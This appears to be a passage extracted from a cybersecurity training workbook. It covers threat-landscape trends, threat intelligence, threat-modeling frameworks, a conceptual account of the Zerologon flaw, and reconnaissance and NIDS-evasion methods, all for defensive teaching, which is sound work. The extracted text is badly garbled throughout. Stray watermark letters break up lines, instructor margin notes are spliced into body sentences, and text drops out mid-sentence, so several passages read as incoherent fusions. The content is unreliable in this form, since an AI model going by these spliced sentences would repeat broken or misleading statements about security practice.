credentials, especially their passwords; why come up with a strong password for an account
you're just going to forget in a week? Attackers pounce on weak account information to begin
assuming a user's identity, even if that account is limited in what it can do. People often use the
same credentials or profile information across multiple accounts, which only adds to the attack
surface of a person's digital identity.
e
• PII and PHI: Users place trust in companies, especially those running web services, to keep
their personally identifiable information (PII) and protected health information (PHI) safe from
ut
prying eyes. There's been no shortage of recent PII and PHI breaches in the news, however.
Attackers seek out PII and PHI to sell a person's contact information to the highest bidder, but
ib
they also leak certain details about a person's identity or health to harass, frustrate, and embarrass
their victims.
• Intellectual property: Easy access to powerful software and hardware tools can help users
tr
circumvent digital rights management (DRM) mechanisms. Companies or individuals that deal in
copyrighted materials like video, audio, and interactive assets are particularly at risk. Likewise,
is
trade secrets are commonly targeted as part of corporate espionage and sabotage efforts, as well
as extortion attempts. Despite their efforts to stem online piracy, content developers and
D
publishers frequently see their assets distributed on file sharing services.
• National security data: The rise of cyberwarfare, cyberterrorism, and hacktivism has, on several
occasions, led to the compromise of national security data. For example, in 2020, multiple
or
government agencies and government contractors across the world suffered data breaches that
exposed sensitive documents, source code, security tools, cryptographic secrets, and much more.
U.S. officials identified the Russian government as the most likely suspect, implying that this
attack was state sponsored.
e
at
Vulnerabilities • As always, social engineering will continue to be one of the most effective forms of attack. There
are two vulnerabilities that still contribute to this: poorly educated and trained Internet users, and
companies that refuse to implement robust security measures like backing up critical data offsite
up
interface with the company network from home networks that are not nearly as secure. In
addition, flaws in VPN software will have a significant impact.
• APIs are becoming more and more common for users to access, but their security has often
ot
lagged behind. Unsecured APIs enable an attacker to gain a foothold into more than just one
target, and third-party targets as well. Traditional defense mechanisms are inadequate against
automated attacks against APIs.
N
• As more and more organizations offload their operations onto the cloud, the degree to which
D
these organizations ignore the unique security challenges of the cloud will also increase. Poorly
secured cloud infrastructure will be an attractive target to attackers looking to steal data or cause
disruption to services. Attackers may even be able to deploy malicious virtual infrastructure
within a cloud environment, causing harm that appears to come from a legitimate source.
e
creating automated ransomware kits and selling them to script kiddies who are interested in quick
ut
and effective means of extorting money from a victim. The high demand for these kits has made
it more worthwhile for their authors to incorporate advanced features, especially anti-malware
evasion techniques. The selling of malicious services is not a new phenomenon; for years,
ib
attackers have rented out botnets for use in denial of service attacks. However, this malicious
business model has only recently extended into the domain of ransomware.
• State-sponsored attack programs are on the rise. The scope and impact of these attack programs
tr
is likely to increase significantly in the near future. This means critical infrastructure will likely
become a bigger target for attackers looking to do more damage.
is
• Some attackers are taking advantage of the public health crisis by specifically targeting the
healthcare sector to glean PHI. For example, the rise of remote doctor's visits has, like remote
D
work, greatly expanded the attack surface. Even beyond PHI, attackers are attempting to steal
highly sensitive data concerning COVID-19 treatments and vaccines to either sell the
information, tamper with it, or destroy it.
or
• Many computer technologies, in the cybersecurity field and elsewhere, are becoming more
empowered by artificial intelligence (AI). If effective, cybercriminals can use AI to create exploits
that adapt to their target environments and operate more efficiently and silently. In some cases,
AI may be able to generate novel attacks, not just boost existing ones.
e
at
Outdated technology is replaced by newer, more effective technology all the time. Security tools and The Latest Security
prevention techniques are no different. Some security technologies that are relatively new and/or Technologies
emerging in the business world are:
up
• Machine learning and deep learning will not just help attackers, but security personnel as well.
AI-powered threat management tools are particularly of interest, as they can identify threats and
respond to them much more quickly and with a greater degree of accuracy than a human
operator. If properly tuned, these AI systems may be able to prevent intrusions that otherwise
D
action to stop that activity. The difference is that EDR systems tend to offer more advanced
detection and response techniques; for example, they can leverage online threat databases in real
time, use machine learning to detect complex or previously unknown threats, and so on.
N
• Cloud access security brokers (CASBs) act as a defensive screen between clients accessing cloud
services and the cloud services themselves. CASBs monitor cloud-based activity for potentially
o
records in the chain (called a ledger). Aside from cryptocurrency, the blockchain sees use
primarily to support secure ledgers in the banking industry, but it is also applicable to any
scenario that requires a decentralized chain of trust.
• User behavior analytics (UBA) evaluates the activities of users in order to identify any such
activity that matches known patterns of malicious or otherwise undesired behavior. Although
traditional security systems can detect some patterns of known behavior, UBA goes one step
further by identifying factors or characteristics of undesired behavior that are not immediately
e
currently facing, but also what threats may be coming in the future and what countermeasures are
ut
emerging to deal with them. You should be able to analyze and interpret trend data to anticipate the
cyber-defense needs of your organization, and stay one step ahead of the attackers.
ib
tr
is
D
or
e
at
lic
Figure 2-3: The number of vulnerabilities by six major vendors over a five-year period as tracked
up
Proper data analytics relies on having a great deal of useful data to draw from. This data can come
D
from a variety of sources, including internal monitoring platforms that record network traffic, as
well as external sources like the CVE and other security databases, and many more. The data from
these sources is put through a process called extract, transform, and load (ETL), in which the
ot
data is collected, combined, cleaned, prepared, and processed to make it more conducive to a deeper
analysis. Various statistical methods and visualizations are applied to the data to reveal useful
patterns. The data may even be used to generate machine learning models that can do a better job of
N
predicting trends.
Note: Data analytics is an entire field of study of its own, and a deeper dive is beyond the scope
o
of this course.
D
Remember, security should not be reactive, but proactive; this could mean the difference between
scrambling to mitigate a security incident and not suffering the incident at all.
e
• Ongoing trends you've identified in the world of cybersecurity, including threats, vulnerabilities,
ut
and technologies.
• Trends that are not yet ongoing, but which industry experts predict will soon come to fruition.
• Examples of why these issues are actually trends and not just isolated one-off incidents.
ib
• Which of the identified trends are most relevant to your current security posture, and which are
less relevant (or not relevant at all).
tr
• What assets are affected by these trends, and how.
• Evidence that these trends have already been affecting your assets or soon will.
is
• What controls the organizational currently has in place to deal with these issues, and whether or
not they are adequate.
D
• Suggestions for updating controls or obtaining new ones to deal with the latest trends.
• Necessary "big picture" changes to your security posture, e.g., fostering a better cybersecurity
culture in the organization or rewriting policies to account for major landscape changes.
• Collection, in which relevant data is identified and gathered within a reasonable time frame. context does not refer to
• Processing, in which the data is prepared to make it easier to use for exploitation (whether by a an attacker taking
human, hardware, or software). advantage of a
up
• Exploitation, in which the significance and the implications of the processed data are identified vulnerability, but a
researcher extracting
and interpreted.
value from intelligence
• Dissemination, in which actionable exploitation findings are distributed to the tasking authority data.
in a timely manner.
D
ot
N
o
D
e
ut
ib
tr
is
D
or
e
at
lic
up
TCPED Architecture
TCPED Architecture Organizations interested in threat intelligence can create a security architecture that implements
ot
TCPED. Although the five phases remain the same, each organization's architecture will be different
based on its own business needs and unique environment. Much of what has already been discussed
in this topic can affect the form and function of that architecture. For example, the sources you
N
collect data from will obviously affect the collection phase of TCPED, but they may also have an
impact on how the data is processed if each source formats data differently.
o
Likewise, how you disseminate threat intelligence will change based on the tasking authority. You'll
need to identify the relevant policies and procedures to know who is authorized to receive the threat
D
intelligence report, and how. For example, service-level agreements (SLAs) for threat intelligence
providers will likely list the personnel the information should be disseminated to, and what the
required channels are for that dissemination.
There are several other factors that affect the TCPED architecture, including, but not limited to:
asset inventory, threat modeling, network scanning, forensic investigation, and e-discovery.
e
• Consult blogs, books, organizations, vulnerability databases, advisory websites, mailing lists, and
social networking sites for security information.
ut
• Exercise discretion and critical thinking as part of your overall situational awareness.
• Recognize the most commonly targeted assets in the current threat landscape.
ib
• Identify some of the most recent vulnerabilities, especially ones with relevance in your
organization.
• Identify the key threats and exploits that may cause trouble for your organization in the near
tr
future.
• Familiarize yourself with recent security technologies such as blockchain tools and machine
is
learning tools.
• Stay informed about the trends in your industry and the cybersecurity industry in general.
D
• Use data analytics to glean insights from trend data.
• Ensure your trend reports are comprehensive and provide suitable evidence of your claims.
• Consider how multiple factors can affect your threat intelligence architecture.
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 2-2
Analyzing Trends Affecting Security Posture
e
You'll be using your Windows® 10 client for this activity.
ut
Activity: Analyzing
Trends Affecting Scenario
Security Posture
As a security practitioner at Develetech, you want to make sure your knowledge of the threat
ib
landscape doesn't lag behind. As part of a new initiative, you'll do research in various areas to gain a
better awareness of your company's security situation. You'll start by finding security-minded blogs
tr
to regularly reference. Then, you'll look up recent vulnerabilities you suspect might affect your
systems.
is
Because Develetech is growing and expanding some of its infrastructure, you'll also want to keep
pace with evolving technology and its implications so that you'll be prepared for the future. All of
this research will keep you and your organization from falling behind in an industry that is always
D
moving forward.
Use this activity as a
vehicle for discussion.
What have students
learned from perusing
these resources? How
1. Find information security blogs.
a) Open a web browser.
or
e
can this knowledge b) Navigate to the web search site of your choice and search for security blogs
affect the security in c) Select any of the results and skim some of the blog's most recent articles. Identify the author(s) and
at
their organizations? evaluate how security subjects are presented. Are the articles objective and free of bias? Do they
Be mindful of your timing rely on subjective accounts and experiences? Are they sensationalized? What else can you
during this activity. Make determine about the author(s)' experience and perspective?
lic
sure to monitor student d) Repeat this process for some of the other blogs returned in your search.
progress and keep them e) Share with the class what you've determined about each blog, and which ones, if any, seem like
on the relevant track. reputable and useful sources of information.
up
before class. b) From the navigation options at the top of the CVE home page, select the Search CVE List link.
c) In the Keyword search text box, type netlogon
d) Select Submit.
ot
e) Read the summary for the item in the list named CVE-2020-1472. A vulnerability exists in the design
of Windows' Netlogon Remote Protocol (MS-NRPC) that can enable a privilege elevation when an
attacker connects to an Active Directory domain controller.
N
f) Select the CVE-2020-1472 link to get a more detailed look at the issue. Select any of the links in the
References section to learn more about the technical aspect of the vulnerability—referred to as
Zerologon—and how it affects Active Directory domain environments.
o
Zerologon is one of the most commonly exploited vulnerabilities today and has been used to attack
multiple different industries around the world. The attacker merely needs to establish a connection
D
with the domain controller to be able to perform the attack. When establishing a connection, the
attacker issues an 8-byte plaintext challenge to the Netlogon service, which then encrypts that
challenge with a session key and produces 8 bytes of ciphertext as a result. The initialization vector
(IV) used to perform the encryption is flawed in that it is a fixed value of 16 bytes of zeros. There is a
1 in 256 chance that an input of 8 bytes of zeros will lead to an encrypted output of 8 bytes of zeros.
When this happens, the server believes the client has proven knowledge of the session key, so it
authenticates that client. The attacker keeps issuing challenges until this happens.
Because Netlogon authentication does not restrict the number of attempts like a normal user
account, the attacker can simply achieve success through brute force. Once authenticated to the
domain controller, the attacker can exploit it in a number of significant ways.
g) Search the CVE for any other specific or general vulnerability that interests you. Share your findings
with the class.
If you're teaching this in
3. Research issues related to evolving technology. 2022 or later, consider
looking for an updated
a) Navigate to https://www.gartner.com/smarterwithgartner/gartner-top-strategic-technology-trends-
report by Gartner or any
for-2021/.
other technology firm to
e
Note: Alternatively, you can go to https://www.gartner.com and search for top stay current.
ut
strategic technology trends.
b) Identify the most significant emerging technologies of the year.
ib
c) Discuss your findings with the class. Will any of these emerging technologies have an effect on your
organization's security? If so, how?
tr
4. Close your browser.
is
D
or
e
at
lic
up
D
ot
N
o
D
Summary
In this lesson, you analyzed the ever-evolving threat landscape by identifying the various
characteristics of threats to computer systems. You also performed ongoing analysis of other factors
affecting your organization's security posture. When you make the effort to understand your
opposition and adapt to it, you'll be better prepared to face security incidents.
Encourage students to
Describe the threats that are the biggest concern to your organization or one
e
use the social
networking tools you're familiar with. What are their skill types, motives, intentions, and so on?
ut
provided on the CHOICE A: Answers will vary. Students who work for financial companies may be predisposed to experienced
Course screen to follow cybercriminals looking to steal money from their organizations or customer accounts. Their vector of
up with their peers after
choice may be stealth based in order to avoid notice and maximize their take. Students who work for
ib
the course is completed
large, public-facing corporations may be more worried about attackers looking for recognition or
for further discussion
and resources to support power. In this case, the attacker may take a more overt approach to their attack. Students who work
for the public sector may see hacktivists and cyberterrorists as more pressing threats. These
tr
continued learning.
attackers are highly motivated and often attack in a more non-targeted fashion to cause any damage
they can.
is
What new vulnerabilities, threats, and technologies concern you the most?
Why?
D
A: Answers will vary. Students may be concerned about the effectiveness of ransomware, especially if
their employees are poorly trained on security issues. The rise of IoT technologies may not
or
immediately impact businesses that work with only traditional computer devices, but the
interconnectedness of all devices is inevitable and significantly challenging to secure. The leveraging
of AI, machine learning, and other automation disciplines in both attack and defense scenarios is also
quickly becoming a major source of concern.
e
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
at
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
lic
e
ut
to Computing and
Network Environments
ib
tr
Lesson Time: 2 hours, 30 minutes
is
D
Lesson Introduction or
e
Before threat actors launch their attack in earnest, they gather information. The information
available to them is almost always a result of their target's behavior. The attacker simply
at
does their own research, and suddenly they've made their job a lot easier. You need to
analyze just what attackers can learn from your organization to get a better picture of what
they'll attack, and how.
lic
Lesson Objectives
up
TOPIC A
Implement Threat Modeling
Before you begin assessing particular threats to the organization, you need to develop a general
strategy for modeling these threats. Threat modeling will enable you to anticipate the process of a
cyber attack, as well as provide you with a threat's impact and possible countermeasures.
e
ut
The Diverse Nature of Threats
The Diverse Nature of Not all threats are strictly technical. Threats may also come from sources such as poor physical
ib
Threats controls (e.g., open or unlocked doors) or vulnerabilities to social engineering (e.g., reckless user
behavior or lack of awareness). Threats may also stem from a corporate culture that disregards the
importance of security, or from a lack of management support and understanding. All of these
tr
variables and more comprise a threat's tactics, techniques, and procedures, or TTPs.
is
While this course focuses primarily on technical TTPs, every tactic, technique, and procedure is
important and should be carefully considered in the organization's risk management processes.
D
The Anatomy of a Cyber Attack
The Anatomy of a Cyber
Attack
Ensure students
understand that attacks
or
To begin understanding how threats can affect your systems, you must understand the actual
components of a cyber attack. Security organizations have come up with several different models to
break down the cyber attack to its core processes. For example, defense contractor Lockheed Martin
developed its Cyber Kill Chain® to describe the anatomy of a cyber attack.
e
are not always linear—
they can go back and
A more general anatomy of a cyber attack is:
at
2. Attack
The attacker initiates the attack and compromises the target systems.
3. Post-Attack
up
The attacker covers their tracks and/or leaves covert exploits on the target systems as a
persistent threat.
D
ot
N
o
D
e
ut
ib
tr
is
Figure 3-1: A streamlined representation of the cyber attack process.
D
An Expanded Approach
The previous approach to a cyber attack can be further expanded into more distinct phases:
1. Reconnaissance
2. Scanning
3. Gaining access
or
e
4. Persistence
5. Expanding access
at
6. Covering tracks
Scanning is often seen as a component of reconnaissance, but it's sometimes seen as a distinct
lic
phase. In this case, reconnaissance is more passive and involves referencing public sources of
intelligence, whereas scanning is more active and involves targeting private assets. The remaining
phases only really apply to an intrusion-style attack. Phase three can fit in the general "attack" phase,
up
and the phases after it can be placed under the larger umbrella of the "post-attack" phase.
Lockheed Martin developed the Cyber Kill Chain to reposition the advantage toward defense.
Typically, the defender has the disadvantage because they must plug every security hole, whereas the
attacker only needs to find one hole in the security framework to be successful. The Cyber Kill
ot
Chain tries to turn this around by helping defenders stop an attacker at any point in the chain,
disrupting the attack entirely. Although this seems like an attractive model to adopt, the Cyber Kill
Chain also has its weaknesses; chiefly, that it relies too heavily on traditional, perimeter-based
N
prevention solutions. If an attacker breaches the firewall or intrusion detection system (IDS) at
the perimeter, the Cyber Kill Chain can be ill-equipped to deal with the attack.
The phases of threats as defined by the Cyber Kill Chain are as follows. Keep in mind that some
o
1. Reconnaissance
2. Weaponization
3. Delivery
4. Exploitation
5. Installation
6. Command and Control
7. Actions on Objectives
Note: For more information on the Cyber Kill Chain, visit https://
www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html.
Threat Modeling
Threat Modeling Threat modeling is the process of identifying and assessing the possible attack vectors that target
systems. These models can encompass general security in an organization or they can apply to
specific systems that are the target of an attack. In addition, some threat models are attacker focused
e
rather than asset focused. Either way, a threat model will assist you in evaluating the risks involved
in a potential attack, as well as the best course to take to mitigate its effects.
ut
The earlier you develop an approach to respond to threats, the easier it will be to mitigate them.
Security is best when it is proactive, not reactive, so waiting for an attack to happen without
ib
identifying and understanding it first will hurt your assets in the long run. Threat modeling also
helps you structure security in a more comprehensive way. You can ensure that you don't miss a
detail, however small, that could significantly impact your organization and its assets. Threat
tr
modeling using graphs and charts also helps you and relevant stakeholders visualize threats so they
are easier to digest.
is
Approaches to Threat Modeling
D
Threat Modeling The characteristics of a threat depend heavily on what that threat targets. Therefore, there are
Process multiple approaches to threat modeling. The following is an example of a generic asset-focused
threat modeling process:
or
1. Identify security objectives and requirements. What are your organization's policies and business
needs?
e
2. Identify the architecture of the target system, including its components, roles, services, and
dependencies.
at
3. Decompose the system further to identify how it functions and how those functions can be
vulnerable. For example, how does your application ensure the confidentiality of data in
lic
transmission?
4. Identify known threats to the target system. Research exploitation databases and other sources of
security intelligence.
up
e
ut
ib
tr
is
Figure 3-2: A general approach to threat modeling. The process is repeatable for each system
you profile.
D
You may wish to inform
STRIDE students of other
• Repudiation
• Information disclosure
• Denial of service
lic
• Elevation of privilege
up
Attack Trees
Other than the general process of modeling a threat, you may also implement visual aids that more Attack Trees
specifically outline how a threat operates. For example, assume that you have developed an app that
D
has an instant messaging capability. As you go through your threat modeling process, you identify
the threat of a malicious user intercepting messages not meant for them. To model this threat, you
can create an attack tree that identifies the threat, how the threat can occur, and how to mitigate
ot
e
ut
ib
tr
is
Figure 3-3: An attack tree evaluating a man-in-the-middle threat to an instant messaging
D
feature in an app.
Attack trees can be as simple or complex as your needs dictate. The aforementioned example is
or
relatively simple, whereas a more complex tree will add a number of factors, including:
• Having multiple levels of attack vectors, especially if one attack vector leads to another. This
establishes a parent–child relationship.
e
• Including all possible attack vectors as sub-nodes of the root threat.
• Assigning a probability to each attack vector node, depending on how likely it is for an attacker
at
vectors to climb to the next highest node on the tree and the latter requiring only one.
• Assigning monetary loss values to each attack vector.
• Assigning cost values to each control/mitigation node.
up
Threat Modeling Tools There are several tools that can make the task of threat modeling easier and more productive. The
following table describes some of the more common ones.
N
Tool Description
Microsoft® SDL A freeware tool developed by Microsoft to integrate with their Security
o
Threat Modeling Tool Development Lifecycle (SDL) framework. Primarily used by software
developers. It integrates the STRIDE classification.
D
Tool Description
Open Source An open source tool intended to integrate with a systems development
Requirements lifecycle (SDLC) framework. Also includes threat modeling capabilities.
Management Tool
CORAS Risk An open source tool designed around the CORAS model of risk
Assessment Platform assessment. Also includes threat modeling capabilities.
draw.io A general purpose open source diagramming tool available as an online
e
web app (https://draw.io) and also a standalone desktop application.
Although not specifically designed with attack trees in mind, it can be
ut
used to easily create them.
ib
Threat Categories
It's useful to categorize threats that have some qualitative similarities or differences. This can help Threat Categories
tr
guide your approach to those threats and tailor that approach to your organization's unique Inform students there
circumstances. This course recognizes the following threat categories: are other ways to
is
categorize threats.
• Reconnaissance
• Social engineering
D
• System hacking
• Web-based threats
• Malware
• Hijacking and impersonation
• Denial of service
• Mobile-based threats
or
e
• Cloud-based threats
at
lic
up
D
ot
N
o
D
ACTIVITY 3-1
Analyzing a Threat Model
Data Files
e
C:\CNX0013Data\Analyzing Reconnaissance Threats to Computing and Network Environments
\web_server_attack_tree.png
ut
C:\CNX0013Data\Analyzing Reconnaissance Threats to Computing and Network Environments
\web_server_attack_tree.drawio
ib
Activity: Analyzing a
Threat Model (2 Slides) Scenario
tr
Use the second, The security team wants to redesign Develetech's security from the ground up, and a big step in this
animated slide to go process will involve understanding the threats the organization is exposed to. You'll focus on one of
through the attack tree the more likely threats—an attack on Develetech's web servers.
is
with students step by
step. You'll analyze an attack tree that maps out the different possible web-based attacks, and the
suggested mitigation techniques for each. With complete and comprehensive threat models, your
D
Time permitting, and if
students show interest, organization will be better prepared to defend itself against attacks in a timely and efficient manner.
consider using the
Note: The attack tree is presented as images in this activity. The full attack tree is also provided
draw.io app to either
import the attack tree
diagram and modify it
based on students'
answers to the
or
in the data files as a raster image (PNG) and as an XML-based file that can be imported into the
diagramming tool draw.io. You can navigate to https://app.diagrams.net to use the online
web app, or download the Windows desktop version from https://github.com/jgraph/
drawio-desktop.
e
questions, or create a
at
Consider drawing
attention to any attacks, and file inclusion attacks. Additional attack types include cross-site request forgery
subattacks or (XSRF/CSRF) attacks, directory traversal, and session hijacking.
countermeasures
ot
offered by students that 3. Examine the tree now that several subattacks have been added.
aren't part of the Notice that each subattack points toward the root attack node, implying that each of these are ways in
provided attack tree.
N
4. Can you think of any specific countermeasures that might mitigate one or
o
identifies three: using parameterized queries to mitigate SQL injection; limiting or sanitizing user
HTML input to mitigate XSS; and creating whitelists and access identifiers to mitigate file inclusion
attacks.
Several countermeasures are now shown. An arrow points from each subattack to its corresponding
mitigating tactic. The arrows are dashed instead of solid to further distinguish them from the top set of
arrows.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC B
Assess the Impact of Reconnaissance
Now that you've implemented threat models to analyze how your systems are susceptible to attack,
you can begin switching your focus to the specific threat categories. In particular, the type of threat
that is often the precursor to more direct attacks is reconnaissance. Understanding reconnaissance
e
techniques will reveal how much useful information you're unintentionally providing to malicious
users.
ut
Footprinting, Scanning, and Enumeration
ib
Footprinting, Scanning, Footprinting, scanning, and enumeration are the three processes that make up reconnaissance. The
and Enumeration information revealed in these processes can aid the attacker by exposing vulnerabilities or easily
tr
Ensure students exploitable vectors that can be used to attack an organization.
understand that
is
Footprinting is a phase in which the attacker gathers general information about a target and the
footprinting is not the
same thing as
people or systems that use it. The information gathered can center on the target's technology,
personnel, and structuring. Footprinting is typically done with the assistance of common, public
D
fingerprinting, which is
discussed shortly. tools, rather than requiring the attacker to directly compromise an organization's hosts or network.
In the next phase, scanning is a more active way of gathering information about a target. Attackers
or
will use scanning tools to discover information about various hosts and services running on a
network. The purpose of a scan is to reveal specific information about targets. Scanning requires
more direct access to a target than footprinting.
The last step of reconnaissance, enumeration, sees an attacker trying to connect to services and
e
retrieve detailed information from those services. This can include enumerating particular
at
networking protocols to discover how a network is structured (its topology) and how it is
vulnerable. Like scanning, enumeration requires a direct interface with the target.
lic
Footprinting Methods
Footprinting Methods There are several methods an attacker can use to glean preliminary information about a target:
up
• Publicly available information: With a web browser and an Internet connection, an attacker
can harvest information such as the IP addresses of an organization's Domain Name System
(DNS) servers; the range of addresses assigned to the organization; names, email addresses, and
D
phone numbers of contacts within the organization; and the organization's physical address.
These are often publicly available through Whois records, Securities and Exchange Commission
(SEC) filings, telephone directories, and more. Publicly available information is also referred to as
ot
engineering to gain even more private information. This type of information is called closed
source intelligence because it is not meant to be publicly available.
o
• HTML code: The HTML code of an organization's web page can provide information, such as
IP addresses and names of web servers, operating system versions, file paths, and names of
D
developers or administrators.
• Social media: Attackers can also use social media sites like Facebook and LinkedIn to mine for
an organization's information. Depending on how much an organization or an organization's
employees choose to share publicly, an attacker may find posts or user profiles that give away
sensitive information or simply act as another vector or target for the attacker to take advantage
of.
• Search engines: Attackers targeting web applications can use search engines like Google™ and
Bing® to do their footprinting for them. These search engines can reveal much about web apps,
including domain information for where an app is hosted and the web technology it uses. The
attacker executes an automated script that runs queries on the search engine for a specific web
app, which then filters results by relevance.
• Metadata: Attackers can run metadata scans on publicly available documents using a tool like
Fingerprinting Organizations with Collected Archives (FOCA). For example, Microsoft Office
documents posted on the Internet may not directly divulge sensitive information about an
organization, but an attacker could glean useful information from its metadata, including the
e
names of authors or anyone that made a change to the document. By using search engines such
as Google and Bing, FOCA can also cross-reference files with other domains to find and extract
ut
metadata.
ib
tr
is
D
or
e
at
lic
Attackers can employ various methods in scanning networks and systems. They may: Network and System
• Look for open ports. Open ports may present an attacker with a vector they can use to target a Scanning Methods
host.
ot
• Look for network access points. These may present an attacker with an opening to the network,
or the attacker may shut them down in a denial of service (DoS) attack.
N
• Find applications that are listening on certain ports. An attacker can use software against a host
and cause considerable damage.
• Identify technology used to construct web apps, such as JavaScript, that are known to be highly
o
logical area of the network, or it may even reveal their physical location.
• Identify the operating environment of network hosts. This can make it easier for an attacker to
craft an operating system–specific attack.
• Scan network and system logs for information. Logs may reveal a great deal about how a
particular application, operating system, or device functions, as well as reveal current
configurations.
• Scan access control lists (ACLs) used by routers and firewalls. An attacker can use ACLs to
determine which pathways will be ineffective and which will grant them the access they seek.
Network scans manipulate the three-way handshake to gather their information:
1. Attacker A sends a synchronization request packet to Target B (SYN).
2. Target B sends an acknowledgement of this request back to Attacker A (SYN-ACK).
3. Attacker A sends an acknowledgement back to Target B (ACK).
Note: A SYN request without a resulting acknowledgement (ACK) implies that the target did
e
not accept the packet.
ut
ib
tr
is
D
or
e
at
lic
Figure 3-5: A scanning tool (Vega) detecting the presence of AJAX in a web app.
Enumeration Methods
up
Enumeration Methods Attackers use enumeration to map a network. They can do this in several ways, including:
• Querying Domain Name System (DNS) servers. DNS servers are common reconnaissance
D
targets because, if not properly secured, they can provide a detailed map of an organization's
entire network infrastructure.
• Enumerating Simple Network Management Protocol (SNMP) devices on a network. A poorly
ot
without a user name and password, where they can view information about policies, groups, and
other domain information.
• Enumerating domain directories like Active Directory. If an attacker identifies a poorly secured
o
user account or network share, they can use this to take advantage of other systems. They can
D
also crawl directory services to enumerate email accounts, which is useful in a variety of attacks.
• Enumerating applications that run on web servers, like Microsoft's Internet Information Services
(IIS). This enables the attacker to craft their exploits to target certain web server software.
• War driving to identify wireless networks in range of a moving vehicle.
• Fingerprinting hosts to determine their operating systems and other details and characteristics.
A malicious executable for one operating system may not work on another, so an attacker must
know their targets' platforms.
e
ut
ib
tr
is
Figure 3-6: Using Nmap to enumerate networking information.
D
Variables Affecting Reconnaissance
The exact tools and methods an attacker uses for reconnaissance, as well as how effective they are, Variables Affecting
will vary depending on the following major factors:
or
• Wireless vs. wired: Wired connections will limit an attacker's ability to sniff traffic transmitted
outside their own connected host unless they are able to configure the switch or router to
forward all traffic to their host. In a wireless network, the attacker will be able to sniff every node
Reconnaissance
e
connected to the access point. However, in most secure environments, the network will be
at
configured with an encryption scheme like Wi-Fi Protected Access 2 (WPA2) or WPA3. This can
prevent the attacker from reading a packet's contents, unless the attacker is able to capture the
authentication handshakes between a node and the access point. Ultimately, the type of network
lic
can limit the reach of a reconnaissance attempt, as well as its effectiveness in gathering usable
information.
• Virtual vs. physical: Virtual systems may be set up as a sandbox used to foil the attacker; if
up
properly segmented, the attacker will learn very little, or they may end up operating under false
assumptions about how the network and its hosts are configured. Still, some organizations
virtualize quite a bit of their infrastructure, so the attacker may be able to discover valuable
information without needing to engage in physical reconnaissance. Depending on the attacker's
D
relationship with their target, they may be able to gain physical access to an organization and
scout its various devices and appliances.
• Internal vs. external: As you've seen, insiders are often at an advantage when it comes to
ot
valuable knowledge about how an organization operates. If they already have the information
that will enable them to launch a successful attack, then they may not need to engage in the kind
N
of deep reconnaissance that will put their attack at risk of being discovered. External actors, on
the other hand, will often have a more difficult and drawn-out reconnaissance phase. However,
the advantage is not always in the insider's favor; any reconnaissance they actually do could be
o
more easily traced back to them. An external actor, on the other hand, may be more effective at
shielding themselves with anonymity.
D
• On-premises vs. cloud: Many organizations are ill equipped to secure their operations against
attack. Attackers can perform reconnaissance on insecure on-premises systems with relative ease.
If an organization's infrastructure is hosted in the cloud, on the other hand, they may be unable
to penetrate the cloud vendor's security. Still, security-minded organizations will have full control
over their on-premises systems. In a cloud environment, the organization is often at the mercy of
the provider, and must trust they will adequately protect the organization's assets. This trust is
often misplaced, especially since cloud providers are huge targets that store sensitive data for
many different organizations.
Consider mentioning
that the interface
between cloud provider How Attackers Evade Detection During Reconnaissance
and client can also affect
reconnaissance. Organizations typically employ a network-based intrusion detection system (NIDS) to detect
How Attackers Evade technical reconnaissance mechanisms like scanning and enumeration. An NIDS employs different
Detection During methods of detection, but one of the most common methods is through signature analysis.
e
Reconnaissance Signature analysis is similar to its use in anti-malware software in that it compares an action against
known attack properties, and if these match, it produces an alarm. There are, however, ways that
ut
attackers bypass signature-based network intrusion detection:
Ensure students know • The attacker obfuscates their network packets so the NIDS will be unable to match its signature
there are techniques for
ib
with known values. The packets might include extra, irrelevant characters or characters that
inspecting encrypted
transmissions, so this
perform the same function but in different ways. The effectiveness of this technique will depend
evasion technique is not on the strength of the NIDS, as newer systems may be smart enough to interpret these attempts
tr
always effective. at obfuscation.
• If traffic across the network is encrypted, the NIDS will be unable to analyze its contents in most
is
cases. Attackers can use this to their advantage by allowing their reconnaissance efforts to be
encrypted.
D
• The attacker may also take a more aggressive approach by initiating a DoS on the NIDS. Like
other network devices and technology, a NIDS flooded with too much traffic will be unable to
perform its duties, rendering it useless in detecting a reconnaissance attempt.
or
• The attacker may be able to avoid notice entirely if they perform reconnaissance exclusively
through public sources. In this case, the attacker is not at risk of being detected, or is at least
shielded from detection since anyone can access these public sources.
e
Reconnaissance Tools
at
Reconnaissance Tools The following are examples of popular tools attackers may use for reconnaissance.
As time permits,
lic
Footprinting tools
consider demonstrating
some of these tools or • Whois
navigating to the sites • nslookup
up
• Maltego
Scanning tools
• Nmap®
ot
• ping
• tracert
N
• netstat
• Netcat
• Snort®
o
• Vega
D
Enumeration tools
• Nmap
• Nessus®
• snmpwalk
• smbmap
• nbtscan
Additional Tools
Almost every security or attack tool that reveals some kind of information about a target can be
used in reconnaissance. For example, vulnerability scanners; intrusion detection/prevention systems
(network and host based); security information and event management (SIEM); network appliance
logs (e.g., rule-based firewall logs); system logs (e.g., syslogs); and more are always potential
components of an attacker's reconnaissance suite.
e
Packet Trace Analysis
ut
Packet trace analysis, also known as traffic analysis, is one of the most powerful techniques for Packet Trace Analysis (2
detecting and assessing reconnaissance threats, as well as many other types of cyber attacks. Slides)
ib
The contents and metadata of captured packets can reveal a lot, but even by just looking at general Students will be using
Wireshark in the
flow patterns of packet traffic, you can be tipped off to a potential problem. Packet trace analysis
upcoming activities.
tr
can reveal insights without digging into packet content, such as when the packet contents are However, consider
encrypted. For example, a brief exchange of small payloads with consistent pauses between each briefly demonstrating the
is
packet might imply an interactive session between two hosts, whereas sustained streams of large tool here.
packets might imply a file transfer. This is not much to go by on its own, but combined with other
sources, packet trace analysis can reveal useful information.
D
Clues derived from packet trace analysis might help an intruder, but they are also quite useful for
defensive monitoring and security intelligence analysis. Over time, your monitoring system can
In some regards, command-line tools, such as tcpdump, are convenient for packet trace analysis
because they are often present within the operating system, can be driven by scripts, and produce
e
structured content that can be processed by scripts. So they are geared toward quick-and-dirty
at
manual analysis or automated (script-driven) analysis, but they typically do not provide the advanced
analysis features included in a graphical tool such as Wireshark.
lic
up
D
ot
N
o
D
ACTIVITY 3-2
Performing Reconnaissance on a Network
e
